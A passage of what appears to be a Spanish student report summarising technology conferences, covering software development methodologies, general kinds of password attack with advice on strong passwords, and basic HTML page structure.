encontrar pruebas de ciertas conductas. Presentación. Es el recopilar toda la información que se obtuvo a partir del análisis para realizar el reporte y la presentación a los abogados. METODOLOGÍA DE DESARROLLO DE SISTEMAS DE INFORMACIÓN Metodología Ciencia del método.Conjunto de métodos que se siguen en una investigación científica o en una exposición doctrinal. Métodos del desarrollo de sistemas de información 1. 2. 3. 4. 5. 6. Especificación de requerimientos Análisis. Diseño. Programación. Pruebas Implementación.
  • 5. Objetivos Asegurar la uniformidad y calidad tanto del desarrollo como del sistema. Satisfacer las necesidades de los usuarios del sistema. Conseguir un mayor nivel de rendimiento y eficiencia del personal asignado al desarrollo. Ajuste a los plazos y costos previstos en la planificación. Generar de forma adecuada la documentación asociada a los sistemas. Facilitar el mantenimiento posterior de los sistemas. Cascada pura. Beneficios. Secuencia ordenada de métodos. Está dirigido por documentos. Detección temprana de errores. Reduce costos de planificación. Permite a la organización a generar capital humano. Desventajas. Avance lento del proyecto. Resultados palpables solo al final del proyecto. Exceso de documentación útil. Volátil en tiempos de entrega. Costos altos en inversión tecnología. Pruebay error. Poco útil, bastante común. No requiere definición formal. Es intuitiva. De rápido acceso a puesta en producción. Es eficiente para pequeños proyectos. No genera documentación. Excede en confianza. Método prototipo Requiere de un usuario experto. Genera un sistema que funciona. El requerimiento de información no está bien definido. Genera un sistema piloto de pruebas. Garantiza funcionalidad pero no desempeño. Modelo en espiral Es un modelo de proceso de software evolutivo, enlaza prototipos y cascada. Genera un crecimiento incremental de grado de definición e implementación. Precisa puntos de retorno. Provoca toma de decisiones más certeras.
  • 6. Útil para grandes desarrollos. Scrum Metodología ágil y flexible. Muy alto involucramiento del usuario. Reuniones programadas diarias. Construye primero la funcionalidad de mayor valor para el cliente. Entregas parciales funcionales. Genera capital humano interno a la organización. ATAQUES QU VULNERAN LA CONTRASEÑA. Que alguien la adivine Si tu contraseña es muy obvia, puede resultar fácil para el vecino que quiere colgarse a tu WiFi adivinar que la contraseña es el número de departamento, o tu apellido, o algo así. Ataques de fuerza bruta Un ataque bastante común, donde un hacker intenta apuntarle por la fuerza a la contraseña intentando todas las combinaciones posibles de letras (aaaa, aaab, aaac...) hasta llegar a la tuya. La única manera de volverse resistente a esto es con contraseñas más largas y complejas, que hacen que el proceso se demore más de lo que el hacker está dispuesto a esperar. Ataque de palabras comunes En lugar de usar combinaciones de letras, se usan combinaciones de palabras que existen, como árbol, casa, sol, etc. Ataque diccionario En lugar de sólo usar palabras comunes, se usa un diccionario de contraseñas comunes (hay múltiples bases de datos de esto que crecen con cada hackeo). Métodos de Autenticación. Algo que se. Algo que tengo. Algo que soy. Construyendo una contraseña fuerte Usa un mínimo de 8 caracteres. No repetir las letras y si lo haces procura que alguna esté en mayúscula. Utilizar todo tipo de caracteres especiales y signos de puntuación. No usar información personal en la elaboración de estas (nombre de tu mascota o fecha de cumpleaños). HTML Es un estándar que, en sus diferentes versiones, define una estructura básica y un código (denominado código HTML) para la definición de contenido de una página web, como texto, imágenes, etc.
  • 7. El HTML se escribe en forma de «etiquetas», rodeadas por corchetes angulares (<,>). HTML también puede describir, hasta un cierto punto, la apariencia de un documento, y puede incluir o hacer referencia a un tipo de programa llamado script, el cual puede afectar el comportamiento de navegadores web y otros procesadores de HTML. Para crear una página web se pueden utilizar varios programas especializadosEstructura de los documentos de HTML. Un documento escrito en HTML contiene las siguientes etiquetas en el siguiente orden: <HTML> <HEAD> <TITLE> Título de mi página de Internet </TITLE> </HEAD> <BODY> <H1><CENTER>Primerapagina</CENTER></H1> <HR>
  • 8. CONCLUSIONES Es importante resaltar el aporte educativo a nivel tecnológico que fue presentada en cada una de las conferencias, además se debe considerar los diferentes tipos de avances a nivel tecnológico e informático para de este modo poder tener soluciones a problemas generados por los mismos. RECOMENDACIONES Incentivar a la institución este tipo de eventos para mejorar la calidad educativa de la misma. BIBLIOGRAFIA. Video conferencias.